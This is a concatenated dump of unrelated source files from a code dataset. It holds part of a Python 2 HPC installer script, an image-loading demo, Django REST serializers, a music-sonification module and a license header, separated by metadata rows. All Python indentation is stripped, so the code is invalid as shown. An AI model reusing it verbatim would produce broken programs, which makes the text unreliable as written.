sys.exit(1)
try:
version = int(sw_structure[2].replace(".", ""))
if version < 0:
raise ValueError()
except ValueError:
print >> sys.stderr, term.bold_red("The software name and version must be specified as <build-software-version>. Got '" + filename + "' instead.")
print >> sys.stderr, term.bold_red("Or you may use any filename, by including #HPCI -n software' and '#HPCI -v version' directives")
sys.exit(1)
return sw_structure[1], sw_structure[2]
def validate_url(u):
# cut and paste from django with localhost removed, no test needed
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return regex.match(u)
def get_modules_in_script(install_script_str):
failed = 0
legacy_stuff = parse_installscript_for_directives(install_script_str)
stuff = parse_installscript_for_directives(install_script_str, "-")
if len(stuff) == 0:
modules_to_load = ""
modules_prereq = ""
if len(legacy_stuff) > 0:
print >> sys.stderr, term.bold_red("Deprecation ERROR: The anonymous '#HPCI foo' directive is deprecated.")
print >> sys.stderr, term.bold_red(" Must use the named '#HPCI -x foo' directive instead.")
failed = 1
else:
if len(legacy_stuff) != len(stuff):
print >> sys.stderr, term.bold_red("ERROR: anoymous '#HPCI foo' directives are not supported anymore")
print >> sys.stderr, term.bold_red(" use '#HPCI -x foo' directives instead.")
failed = 1
modules_to_load, modules_prereq = parse_installscript_for_modules(install_script_str)
return failed, modules_to_load, modules_prereq
def get_config_data(env_sudo_user): # sudo_user is dependency only via environmental variable, adding pseudo-dependency here
failed = 0
config_filename = ( os.path.dirname(os.path.realpath(__file__)) + # directory where this script is
"/config.hpcinstall.yaml" )
try:
defaults = parse_config_data(open(config_filename))
except KeyError, e:
print >> sys.stderr, term.bold_red("Error: " + config_filename + " does not contain the expected fields"), e.args[0]
failed = 1
except IOError as e:
print >> sys.stderr, e
print >> sys.stderr, term.bold_red("Cannot read " + config_filename + " -- ABORTING")
failed = 1
return failed, defaults
def test_modules(modules_to_load, debug, script_name):
failed = 0
if subcall(modules_to_load, # try loading modules
stop_on_errors=True, # stop at the first failure
debug=debug, # use specified debug level
) != 0:
print >> sys.stderr, term.bold_red("Modules from " + script_name + " are not loadable:")
print >> sys.stderr, modules_to_load
failed = 1
return failed
def check_sudo_user(nossh, req_csgteam, arg_sudo_user):
failed = 0
if nossh:
env_sudo_user = os.environ.get('SUDO_USER', '')
if arg_sudo_user is not None:
if env_sudo_user == '':
os.environ['SUDO_USER'] = arg_sudo_user
else:
if env_sudo_user != arg_sudo_user and req_csgteam:
print >> sys.stderr, term.bold_red("ERROR: Can't figure out the actual user invoking csgteam")
failed += 1
else:
# no need to store in env, since it was there already
arg_sudo_user = env_sudo_user
if arg_sudo_user == "" and req_csgteam:
print >> sys.stderr, term.bold_red("ERROR: Can't figure out the actual user invoking csgteam")
failed += 1
else:
arg_sudo_user = ""
return failed, arg_sudo_user
def get_program_name_and_version(install_script_str, install_script_name):
failed = 0
progname = parse_installscript_for_directives(install_script_str, "-n")
progver = parse_installscript_for_directives(install_script_str, "-v")
if len(progname) > 1 or len(progver) > 1:
print >> sys.stderr, term.bold_red("'#HPCI -n software' and '#HPCI -v version' can't be specified more than once")
failed += 1
if len(progname) == 1 and len(progver) == 1:
return failed, progname[0], progver[0]
else:
return sum(((failed,), parse_installscript_filename(install_script_name)), ()) # tuple flattening
def parse_command_line_arguments(list_of_files):
parser = argparse.ArgumentParser()
parser.add_argument("install_script", metavar="install-software-ver", type=argparse.FileType('r'),
help="script in the current directory which\n" +
" does the build and install (do not use\n" +
" './', relative nor fully qualified paths)")
parser.add_argument("-c", "--csgteam", action="store_true", default=False, help='Install as csgteam (default: False)')
parser.add_argument("-f", "--force", action="store_true", default=False, help='Force overwrite of existing install (default: False)')
parser.add_argument("-d", "--debug", action="store_true", default=False, help='Debug mode i.e. more verbose output (default: False)')
parser.add_argument("-p", "--preserve", action="store_true", default=False, help='Preserve current environment - not valid with --csgteam (default: False)')
parser.add_argument("--bypass-prompt", action="store_true", default=False, help='Bypass prompt when installing as --csgteam (default: False)')
parser.add_argument("--nossh", nargs='?', help=argparse.SUPPRESS) # Never manually invoke this
# do not add a command line argument named defaults, because it will be overridden (see below)
# do not add a command line argument named modules-to-load or modules_to_load, because it will be overridden (see below)
# do not add a command line argument named urls, because it will be overridden (see below)
# do not add a command line argument named tarballs, because it will be overridden (see below)
# do not add a command line argument named prog, because it will be overridden (see below)
# do not add a command line argument named vers, because it will be overridden (see below)
# do not add a command line argument named prereq, because it will be overridden (see below)
# do not add a command line argument named sudo-user or sudo_user, because it will be overridden (see below)
num_failures = 0
try:
args = parser.parse_args()
except IOError, e:
print >> sys.stderr, term.bold_red("Troubles accessing <install-software-ver> file")
print >> sys.stderr, e
print
parser.print_help()
sys.exit(1) # can't try most of the following
install_script_str = args.install_script.read()
failed, args.modules_to_load, args.prereq = get_modules_in_script(install_script_str)
num_failures += failed
# Check who issued the ssh during execution step (not during initial pass)
# and set related arguments
really_csgteam = args.csgteam and os.environ['USER'] == "csgteam"
arg_sudo_user = args.nossh
args.nossh = "--nossh" in sys.argv
failed, env_sudo_user = check_sudo_user(args.nossh, really_csgteam, arg_sudo_user)
num_failures += failed
failed, args.defaults = get_config_data(env_sudo_user)
num_failures += failed
# Make sure user doesn't preserve environment during system install
if args.preserve and args.csgteam:
print >> sys.stderr, term.bold_red("ERROR: preserve environment not allowed for system installation (-c).")
num_failures += 1
# Test requested modules during initial pass
if not args.nossh:
if args.defaults['use_modules']:
num_failures += test_modules(args.modules_to_load, args.debug, args.install_script.name)
else:
args.modules_to_load = ""
args.urls = parse_installscript_for_directives(install_script_str, "-u")
for u in args.urls:
if not validate_url(u):
print >> sys.stderr, term.bold_red("URL specified in install script " + args.install_script.name + " is not a valid URL: " + u)
num_failures += 1
tarballs = parse_installscript_for_directives(install_script_str, "-a")
parsed_tarballs = []
for tarball in tarballs:
globbed_tarballs = glob.glob(tarball)
if len(globbed_tarballs) == 0:
print >> sys.stderr, term.bold_red("Cannot find tarball: " + tarball)
for globbed_tarball in globbed_tarballs:
t = os.path.abspath(os.path.expanduser(globbed_tarball))
parsed_tarballs.append(t)
if not os.access(t, os.R_OK):
print >> sys.stderr, term.bold_red("Troubles accessing file: " + t)
num_failures += 1
else:
list_of_files.append(t)
args.tarballs = parsed_tarballs
if len(args.urls) == 0 and len(args.tarballs) == 0:
print >> sys.stderr, term.bold_red("ERROR: Either or both the '#HPCI -u URL' and '#HPCI -a source.tgz' must be provided")
num_failures += 1
failed, args.prog, args.vers = get_program_name_and_version(install_script_str, args.install_script.name)
num_failures += failed
args.clobber = False
other_options = parse_installscript_for_directives(install_script_str, "-o")
for one_opt in other_options:
if one_opt == 'CLOBBER':
ask_confirmation_for(True, "WARNING!!! This will clobber the existing directory. Continue anyway? ")
args.clobber = True
else:
print >> sys.stderr, term.bold_red("Unsupported option #HPCI -o " + one_opt)
num_failures += 1
if num_failures > 0:
print >> sys.stderr, "" # just an empty line to make the output more clear in case of errors
parser.print_help()
sys.exit(1)
return args
def ask_confirmation_for(really, msg):
if really:
print msg,
answer = sys.stdin.readline()
print
if answer.lower().strip() != "yes":
print >> sys.stderr, term.bold_red("You did not say an enthusiastic 'yes', aborting...")
sys.exit(1)
def get_prefix_and_moduledir(options, bin_dep, mod_dep):
default_dirs = options.defaults
my_prog = options.prog + "/" + options.vers
if options.csgteam:
if os.environ['USER'] != "csgteam":
ask_confirmation_for(options.csgteam, "Should sudo into 'csgteam' to install as such. Continue anyway? ")
prefix = os.path.abspath(default_dirs["sw_install_dir"] + "/" + my_prog + "/" + bin_dep)
moduledir = os.path.abspath(default_dirs["mod_install_dir"])
else:
if "HPCI_TEST_BASEPATH" in os.environ:
basepath = os.environ['HPCI_TEST_BASEPATH']
else:
basepath = default_dirs["scratch_tree"] + "/test_installs/"
prefix = os.path.abspath(basepath + "/" + my_prog + "/" + bin_dep)
moduledir = os.path.abspath(basepath + "/modulefiles/")
if os.path.exists(prefix):
if not options.force and not options.clobber:
print >> sys.stderr, term.bold_red("ERROR: Path already exists: " + prefix)
sys.exit(1)
if options.force:
ask_confirmation_for(options.csgteam, "WARNING: " + prefix +
" already exists and you speficied --force to delete it. Continue? ")
shutil.rmtree(prefix)
directories = namedtuple('Directories', ['prefix','basemoduledir','idepmoduledir','cdepmoduledir', 'relativeprefix'])
if mod_dep == "":
cdep_dir = "not_compiler_dependent"
else:
cdep_dir = os.path.abspath(moduledir + "/" + mod_dep) + "/"
d = directories(prefix = prefix + "/",
relativeprefix= os.path.abspath("/" + my_prog + "/" + bin_dep) + "/",
basemoduledir = moduledir + "/",
idepmoduledir = moduledir + "/idep/",
cdepmoduledir = cdep_dir)
return d
def prepare_variables_and_warn(dirs, options):
variables = OrderedDict([
('HPCI_SW_DIR', dirs.prefix),
('HPCI_SW_NAME', options.prog),
('HPCI_SW_VERSION', options.vers),
('HPCI_MOD_DIR', dirs.basemoduledir),
('HPCI_MOD_DIR_IDEP', dirs.idepmoduledir),
('HPCI_MOD_DIR_CDEP', dirs.cdepmoduledir),
('HPCI_MOD_PREREQ', options.prereq),
])
print term.bold_green("Setting environmental variables:")
for key in variables:
os.environ[key] = variables[key]
print "{:<17}".format(key), "=", variables[key]
ask_confirmation_for(options.csgteam and not options.bypass_prompt,
"This will attempt global install in " + dirs.prefix +
" by running ./" + options.install_script.name + " as " + os.environ['USER'] + ". Continue? ")
return variables
real_stdout = None
def redirect_output(log):
global real_stdout
if real_stdout == None:
real_stdout = sys.stdout
sys.stdout = open(log, 'w')
def restore_output():
if not real_stdout == None:
sys.stdout = real_stdout
def start_logging_current_session(files_to_archive, log=HPCi_log, continuation=False):
if continuation:
tee.append_out_to(log)
else:
tee.overwrite_out_to(log)
files_to_archive.append(log)
def stop_logging_current_session():
tee.close_all_files()
def wrap_command_for_stopping_on_errors(command):
prefix = "(set -e; "
suffix = ")"
return prefix + command + suffix
def subcall(command, log=None, use_popen = False, debug=False, stop_on_errors=False):
if stop_on_errors:
command = wrap_command_for_stopping_on_errors(command)
if log:
command += " &> " + log
if debug:
print >> sys.stderr, term.bold_blue("DEBUG: " + command)
if use_popen:
return subprocess.Popen(command, stderr=subprocess.STDOUT, stdout = subprocess.PIPE, shell=True)
else:
return subprocess.call(command, shell=True)
def log_full_env(files_to_archive, log_modules=True):
print term.bold_green("Saving environment status in " + env_log + "..."),
subcall("env", env_log)
print "Done."
files_to_archive.append(env_log)
if log_modules:
print term.bold_green("Saving module list in " + module_log + "..."),
subcall("module list", module_log)
print "Done.\n"
files_to_archive.append(module_log)
def expandvars_in_bash(expression):
value = os.path.normpath(subprocess.check_output(["bash", "-c", 'echo -n "' + expression + '"']))
if value =='/':
value = ''
return value
def identify_compiler_mpi(options):
verify_compiler_mpi(options)
bin_comp_mpi = expandvars_in_bash(options.defaults['sw_install_struct'])
mod_comp_mpi = expandvars_in_bash(options.defaults['mod_install_struct'])
return bin_comp_mpi, mod_comp_mpi
def verify_compiler_mpi(options):
compiler = os.environ.get('LMOD_FAMILY_COMPILER','').strip()
mpi = ""
try:
if compiler:
compiler += "/" + os.environ['LMOD_FAMILY_COMPILER_VERSION'].strip()
mpi = os.environ.get('LMOD_FAMILY_MPI','').strip()
if mpi:
mpi += "/" + os.environ['LMOD_FAMILY_MPI_VERSION'].strip() + "/"
except KeyError, ke:
for broken_key in ke.args:
print >> sys.stderr, term.bold_red("Error: " + broken_key + " not set")
sys.exit(1)
vars = ('LMOD_FAMILY_COMPILER', 'LMOD_FAMILY_COMPILER_VERSION', 'LMOD_FAMILY_MPI', 'LMOD_FAMILY_MPI_VERSION')
for v in vars:
if not v in options.defaults['sw_install_struct']:
print >> sys.stderr, term.on_black_bold_yellow("Warning: " + v + " not used in sw_install_struct of config.hpcinstall.yaml")
if not v in options.defaults['mod_install_struct']:
print >> sys.stderr, term.on_black_bold_yellow("Warning: " + v + " not used in mod_install_struct of config.hpcinstall.yaml")
def parse_installscript_for_directives(install_script_str, argument = ""):
directive = "#HPCI " + argument
directive_content = []
for line in install_script_str.splitlines(True):
if line.startswith(directive):
direct_line = line.replace(directive, "", 1).split(" #")[0].strip()
directive_content.append(direct_line)
return directive_content
def parse_installscript_for_modules(install_script_str):
exec_list = parse_installscript_for_directives(install_script_str, "-x")
mtlo_list = parse_installscript_for_directives(install_script_str, "-l")
mtlp_list = parse_installscript_for_directives(install_script_str, "-p")
if len(exec_list) > 0:
modules_to_load = "module purge; " + "; ".join(exec_list)
else:
modules_to_load = "module purge"
if len(mtlo_list) > 0:
modules_to_load += "; ml " + " ".join(mtlo_list)
if len(mtlp_list) > 0:
modules_to_load += "; ml " + " ".join(mtlp_list)
quoted_mtlp_list = []
for mod in mtlp_list:
for m in mod.split(" "):
quoted_mtlp_list.append('"' + m + '"')
return modules_to_load + "; ", ",".join(quoted_mtlp_list)
def execute_installscript(options, files_to_archive, module_use):
current_perm = os.stat(options.install_script.name)
if not options.csgteam: # too often this fail for csgteam
os.chmod(options.install_script.name, current_perm.st_mode | stat.S_IEXEC)
print term.bold_green("Running ./" + options.install_script.name + "...")
stop_logging_current_session() # log the output of the script in a different dir
log = "hpci." + os.path.basename(options.install_script.name) + "-" + str(
datetime.datetime.now().isoformat().split(".")[0].replace("-", "").replace(":", "")) + ".log" # 20161116T114145
start_logging_current_session(files_to_archive, log=log)
p = subcall(module_use + "./" + options.install_script.name, use_popen=True, debug=options.debug)
process_output = " "
while process_output != "": # continue while the process is running, it'll be "" when EOF is reached
process_output = p.stdout.readline() # needs to do this instead of using subprocess.call to allow
print process_output, # 'tee' to log the process output
p.wait()
stop_logging_current_session()
files_to_archive.append(log)
start_logging_current_session(files_to_archive, continuation=True)
print term.bold_green("Done running ./" + options.install_script.name + " - exited with code " + str(p.returncode))
if p.returncode != 0:
ask_confirmation_for(True, "Running " + options.install_script.name + " failed. Archive logs anyway? ")
files_to_archive.append(options.install_script.name)
def archive_in(prefix, files_to_archive):
build_dir = prefix + "/BUILD_DIR/"
if not os.path.exists(build_dir):
os.makedirs(build_dir)
for somefile in files_to_archive:
if os.path.isfile(somefile):
shutil.copyfile(somefile, build_dir + os.path.basename(somefile))
else:
shutil.copytree(somefile, build_dir + os.path.basename(somefile), symlinks=True)
def how_to_call_yourself(args, yourself, pwd, opt):
# Assuming bash makes things MUCH easier, dropping support for other shells
# (it is not less general, since bash can call tcsh, csh, ksh, python, etc.)
# Should support for other shells be added, needs to be done at least in
# wrap_command_for_stopping_on_errors() too.
shell = ["/bin/bash"] #os.environ['SHELL']
python = opt.defaults.get('python_cmd', '')
if python:
python += " "
if "bash" in shell[0]:
shell.append('-l')
shell.append('-c')
args_copy = list(args)
args_copy[0] = os.path.abspath(yourself + "/hpcinstall")
reset_env_hack = "--nossh " + os.environ.get('SUDO_USER', '')
args_copy.append(reset_env_hack.strip())
comb_cmd = opt.modules_to_load + " cd " + pwd + "; " + python + " ".join(args_copy)
if opt.preserve:
new_invocation = comb_cmd
use_shell = True
else:
if opt.defaults['use_modules']:
module_prefix = "ml purge; "
else:
module_prefix = ""
new_invocation = ["ssh","-X","-t","localhost"] + shell + ["'" + module_prefix + comb_cmd + "'"]
use_shell = False
return new_invocation, use_shell
def howto_push_to_github(args, shortprefix):
if not args.defaults.get('script_repo', ''):
return ""
dir = args.defaults['script_repo'] + shortprefix
git = args.defaults.get('git_cmd', 'git')
mkdir = "mkdir -p " + dir + " && "
cp = "cp " + args.install_script.name + " " + dir + " && "
cd = "cd " + args.defaults['script_repo'] + " && "
add = git + " add " + shortprefix[1:] + " && " # remove the trailing slash
commit = (git + ' -c "user.name=${SUDO_USER}" -c "user.email=${SUDO_USER}" commit -m "'
+ args.prog + " v" + args.vers + ' install in `hostname` on `date`" && ')
push = git + " push"
return mkdir + cp + cd + add + commit + push
# execution starts here
if __name__ == "__main__":
files_to_archive = []
options = parse_command_line_arguments(files_to_archive)
script_dir = os.path.dirname(os.path.realpath(__file__)) # directory where this script is
# hack to reset the environment -- assume everything into the environment has been
# reset, and continue executing "as is" the following `if` did not exist.
if not options.nossh:
exe_cmd, use_shell = how_to_call_yourself(sys.argv, script_dir, os.getcwd(), options)
sys.exit(subprocess.call(exe_cmd, shell = use_shell))
bin_comp_mpi, mod_comp_mpi = identify_compiler_mpi(options)
dirs = get_prefix_and_moduledir(options, bin_comp_mpi, mod_comp_mpi)
log_full_env(files_to_archive, log_modules = options.defaults['use_modules'])
start_logging_current_session(files_to_archive)
print_invocation_info()
prepare_variables_and_warn(dirs, options)
execute_installscript(options, files_to_archive, "")
for tarball in options.tarballs:
print term.blue("Archiving file: " + tarball)
for u in options.urls:
print term.blue("For more details about this code, see URL: " + u)
print term.bold_green("Hashdir:"), hashdir.hashdir(dirs.prefix), os.path.abspath(os.path.expanduser(dirs.prefix))
stop_logging_current_session()
hashlog = "hpci.fileinfo.log"
redirect_output(hashlog)
hashdir.hashdir(dirs.prefix, verbose=True)
restore_output()
files_to_archive.append(hashlog)
archive_in(dirs.prefix, files_to_archive)
if options.csgteam:
exe_cmd = howto_push_to_github(options, dirs.relativeprefix)
if exe_cmd:
sys.exit(subprocess.call(exe_cmd, shell=True))
| 46.719577 | 160 | 0.638014 |
07a6b3ffeb25cfc25463e7fad9472a0b77d3c65e | 314 | py | Python | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | 6 | 2020-02-14T15:18:14.000Z | 2022-02-22T15:40:33.000Z | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | null | null | null | HelloWorldFileListAndLoad.py | jhbrito/HelloWorlds | 7e2247ca7f312a516ce6a5054913d59e2f1de0f9 | [
"MIT"
] | null | null | null | import os
import PIL.Image as PImage
import matplotlib.pyplot as plt
pasta = "membrane/train/image"
list_of_files = os.scandir(pasta)
for file in list_of_files:
file_path = os.path.join(pasta, file.name)
image = PImage.open(file_path)
plt.imshow(image, cmap=plt.cm.gray)
plt.show()
print("End")
| 20.933333 | 46 | 0.72293 |
7819c220f6769efa33d8e78f9c4b3bb1f4219fff | 1,589 | py | Python | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | api/api/serializers.py | WadeBarnes/representation-grant-app | 8f85b9664dddff220df5f5a5dc5aa538561d806f | [
"Apache-2.0"
] | null | null | null | """
REST API Documentation for Family Law Act
OpenAPI spec version: v1
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from rest_framework import serializers
from api.models import SurveyResult, User, Application
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["id"]
class ApplicationListSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = [
"id",
"app_type",
"last_updated",
"last_filed"
]
class ApplicationSerializer(serializers.ModelSerializer):
app_user_Id = UserSerializer(many=True, required=False)
class Meta:
model = Application
fields = "__all__"
class SurveySerializer(serializers.ModelSerializer):
class Meta:
model = SurveyResult
fields = [
"id",
"create_timestamp",
"update_timestamp",
"collection",
"survey_type",
"result",
"user_id",
]
| 25.629032 | 76 | 0.64506 |
8e3243b42d2b460f5a017eae4175d3d15d233d15 | 9,980 | py | Python | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 55 | 2020-12-14T08:33:10.000Z | 2022-03-22T16:36:41.000Z | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 6 | 2021-06-25T09:11:29.000Z | 2021-12-17T13:55:19.000Z | libfmp/b/b_sonification.py | arfon/libfmp | 86f39a323f948a5f104f768442359e93620b2bab | [
"MIT"
] | 8 | 2021-06-30T08:34:38.000Z | 2022-01-11T15:59:17.000Z | """
Module: libfmp.b.b_sonification
Author: Meinard Mueller, Tim Zunner
License: The MIT license, https://opensource.org/licenses/MIT
This file is part of the FMP Notebooks (https://www.audiolabs-erlangen.de/FMP).
"""
import numpy as np
def list_to_chromagram(note_list, num_frames, frame_rate):
"""Create a chromagram matrix as np.ndarray from a list of note events.
Args:
note_list (list): A list of note events (e.g. gathered from a CSV file by
:func:`libfmp.c1.c1s2_symbolic_rep.csv_to_list`)
num_frames (int): Desired number of frames for the matrix
frame_rate (float): Frame rate for C (in Hz)
Returns:
C (np.ndarray): Chromagram matrix
"""
C = np.zeros((12, num_frames))
for l in note_list:
start_frame = max(0, int(l[0] * frame_rate))
end_frame = min(num_frames, int((l[0] + l[1]) * frame_rate) + 1)
C[int(l[2] % 12), start_frame:end_frame] = 1
return C
def generate_shepard_tone(chromaNum, Fs, N, weight=1, Fc=440, sigma=15, phase=0):
"""Generate a shepard tone signal as np.ndarray.
Args:
chromaNum (int): 1=C,...
Fs (scalar): Sampling frequency
N (int): Desired length (in samples)
weight (float): Scaling factor [0:1] (Default value = 1)
Fc (float): Frequency for A4 (Default value = 440)
sigma (float): Parameter for envelope of Shepard tone (Default value = 15)
phase (float): Phase of sine (Default value = 0)
Returns:
tone (np.ndarray): Shepard tone
"""
tone = np.zeros(N)
# Envelope function for Shepard tones
p = 24 + chromaNum
if p > 32:
p = p - 12
while p < 108:
scale_factor = 1 / (np.sqrt(2 * np.pi) * sigma)
A = scale_factor * np.exp(-(p - 60) ** 2 / (2 * sigma ** 2))
f_axis = np.arange(N) / Fs
sine = np.sin(2 * np.pi * np.power(2, ((p - 69) / 12)) * Fc * (f_axis + phase))
tmp = weight * A * sine
tone = tone + tmp
p = p + 12
return tone
def sonify_chromagram(chroma_data, N, frame_rate, Fs, fading_msec=5):
"""Generate a sonification of the chroma features from a chromagram matrix using shepard tones.
Args:
chroma_data (np.ndarray): A chromagram (e.g., gathered from a list of note events by
:func:`libfmp.b.b_sonification.list_to_chromagram`)
N (int): Length of the sonification (in samples)
frame_rate (float): Frame rate for P (in Hz)
Fs (float): Sampling frequency (in Hz)
fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
(Default value = 5)
Returns:
chroma_son (np.ndarray): Sonification of the chromagram
"""
chroma_son = np.zeros((N,))
fade_sample = int(fading_msec / 1000 * Fs)
for i in range(12):
if np.sum(np.abs(chroma_data[i, :])) > 0:
shepard_tone = generate_shepard_tone(i, Fs, N)
weights = np.zeros((N,))
for j in range(chroma_data.shape[1]):
if np.abs(chroma_data[i, j]) > 0:
start = min(N, max(0, int((j - 0.5) * Fs / frame_rate)))
end = min(N, int((j + 0.5) * Fs / frame_rate))
fade_start = min(N, max(0, start+fade_sample))
fade_end = min(N, end+fade_sample)
weights[fade_start:end] += chroma_data[i, j]
weights[start:fade_start] += np.linspace(0, chroma_data[i, j], fade_start-start)
weights[end:fade_end] += np.linspace(chroma_data[i, j], 0, fade_end-end)
chroma_son += shepard_tone * weights
chroma_son = chroma_son / np.max(np.abs(chroma_son))
return chroma_son
def sonify_chromagram_with_signal(chroma_data, x, frame_rate, Fs, fading_msec=5, stereo=True):
"""Sonifiy the chroma features from a chromagram matrix (using :func:`libfmp.b.b_sonification.sonify_chromagram`)
together with a corresponding signal.
Args:
chroma_data (np.ndarray): A chromagram (e.g., gathered from a list of note events by
:func:`libfmp.b.b_sonification.list_to_chromagram`)
x (np.ndarray): Original signal
frame_rate (float): Frame rate for P (in Hz)
Fs (float): Sampling frequency (in Hz)
fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
(Default value = 5)
stereo (bool): Decision between stereo and mono sonification (Default value = True)
Returns:
chroma_son (np.ndarray): Sonification of the chromagram
out (np.ndarray): Sonification combined with the original signal
"""
N = x.size
chroma_son = sonify_chromagram(chroma_data, N, frame_rate, Fs, fading_msec=fading_msec)
chroma_scaled = chroma_son * np.sqrt(np.mean(x**2)) / np.sqrt(np.mean(chroma_son**2))
if stereo:
out = np.vstack((x, chroma_scaled))
else:
out = x + chroma_scaled
out = out / np.amax(np.abs(out))
return chroma_son, out
def list_to_pitch_activations(note_list, num_frames, frame_rate):
"""Create a pitch activation matrix from a list of note events.
Args:
note_list (list): A list of note events (e.g., gathered from a CSV file by
:func:`libfmp.c1.c1s2_symbolic_rep.csv_to_list`)
num_frames (int): Desired number of frames for the matrix
frame_rate (float): Frame rate for P (in Hz)
Returns:
P (np.ndarray): Pitch activation matrix (first axis: Indexed by [0:127], encoding MIDI pitches [1:128])
F_coef_MIDI (np.ndarray): MIDI pitch axis
"""
P = np.zeros((128, num_frames))
F_coef_MIDI = np.arange(128) + 1
for l in note_list:
start_frame = max(0, int(l[0] * frame_rate))
end_frame = min(num_frames, int((l[0] + l[1]) * frame_rate) + 1)
P[int(l[2]-1), start_frame:end_frame] = 1
return P, F_coef_MIDI
def sonify_pitch_activations(P, N, frame_rate, Fs, min_pitch=1, Fc=440, harmonics_weights=[1], fading_msec=5):
"""Sonify the pitches from a pitch activation matrix using sinusoidals.
Args:
P (np.ndarray): A pitch activation matrix (e.g., gathered from a list of note events by
:func:`libfmp.b.b_sonification.list_to_pitch_activations`). First axis: Indexed by [0:127],
encoding MIDI pitches [1:128]
N (int): Length of the sonification (in samples)
frame_rate (float): Frame rate for P (in Hz)
Fs (float): Sampling frequency (in Hz)
min_pitch (int): Lowest MIDI pitch in P (Default value = 1)
Fc (float): Tuning frequency (in Hz) (Default value = 440)
harmonics_weights (list): A list of weights for the harmonics of the tones to be sonified
(Default value = [1])
fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
(Default value = 5)
Returns:
pitch_son (np.ndarray): Sonification of the pitch activation matrix
"""
fade_sample = int(fading_msec / 1000 * Fs)
pitch_son = np.zeros((N,))
for p in range(P.shape[0]):
if np.sum(np.abs(P[p, :])) > 0:
pitch = min_pitch + p
freq = (2 ** ((pitch - 69) / 12)) * Fc
sin_tone = np.zeros((N,))
for i, cur_harmonic_weight in enumerate(harmonics_weights):
sin_tone += cur_harmonic_weight * np.sin(2 * np.pi * (i+1) * freq * np.arange(N) / Fs)
weights = np.zeros((N,))
for n in range(P.shape[1]):
if np.abs(P[p, n]) > 0:
start = min(N, max(0, int((n - 0.5) * Fs / frame_rate)))
end = min(N, int((n + 0.5) * Fs / frame_rate))
fade_start = min(N, start+fade_sample)
fade_end = min(N, end+fade_sample)
weights[fade_start:end] += P[p, n]
weights[start:fade_start] += np.linspace(0, P[p, n], fade_start-start)
weights[end:fade_end] += np.linspace(P[p, n], 0, fade_end-end)
pitch_son += weights * sin_tone
pitch_son = pitch_son / np.max(np.abs(pitch_son))
return pitch_son
def sonify_pitch_activations_with_signal(P, x, frame_rate, Fs, min_pitch=1, Fc=440, harmonics_weights=[1],
fading_msec=5, stereo=True):
"""Sonify the pitches from a pitch activation matrix (using
:func:`libfmp.b.b_sonification.sonify_pitch_activations`) together with a corresponding signal.
Args:
P (np.ndarray): A pitch activation matrix (e.g., gathered from a list of note events by
:func:`libfmp.b.b_sonification.list_to_pitch_activations`)
x (np.ndarray): Original signal
frame_rate (float): Frame rate for P (in Hz)
Fs (float): Sampling frequency (in Hz)
min_pitch (int): Lowest MIDI pitch in P (Default value = 1)
Fc (float): Tuning frequency (in Hz) (Default value = 440)
harmonics_weights (list): A list of weights for the harmonics of the tones to be sonified
(Default value = [1])
fading_msec (float): The length of the fade in and fade out for sonified tones (in msec)
(Default value = 5)
stereo (bool): Decision between stereo and mono sonification (Default value = True)
Returns:
pitch_son (np.ndarray): Sonification of the pitch activation matrix
out (np.ndarray): Sonification combined with the original signal
"""
N = x.size
pitch_son = sonify_pitch_activations(P, N, frame_rate, Fs, min_pitch=min_pitch, Fc=Fc,
harmonics_weights=harmonics_weights, fading_msec=fading_msec)
pitch_scaled = pitch_son * np.sqrt(np.mean(x**2)) / np.sqrt(np.mean(pitch_son**2))
if stereo:
out = np.vstack((x, pitch_scaled))
else:
out = x + pitch_scaled
return pitch_son, out
| 40.241935 | 117 | 0.613327 |
0d14eeaabf35bc5d4ff2647a6addbbb2262be520 | 4,120 | py | Python | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 337 | 2021-07-06T09:09:56.000Z | 2022-03-30T21:42:37.000Z | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 125 | 2021-07-12T11:38:37.000Z | 2022-03-30T19:22:53.000Z | mava/utils/lp_utils.py | sash-a/Mava | 976d0863e058fd92f066d8a8fabe2f5e2f3f60ce | [
"Apache-2.0"
] | 43 | 2021-07-06T19:44:37.000Z | 2022-03-07T09:29:07.000Z | # python3
# Copyright 2021 InstaDeep Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
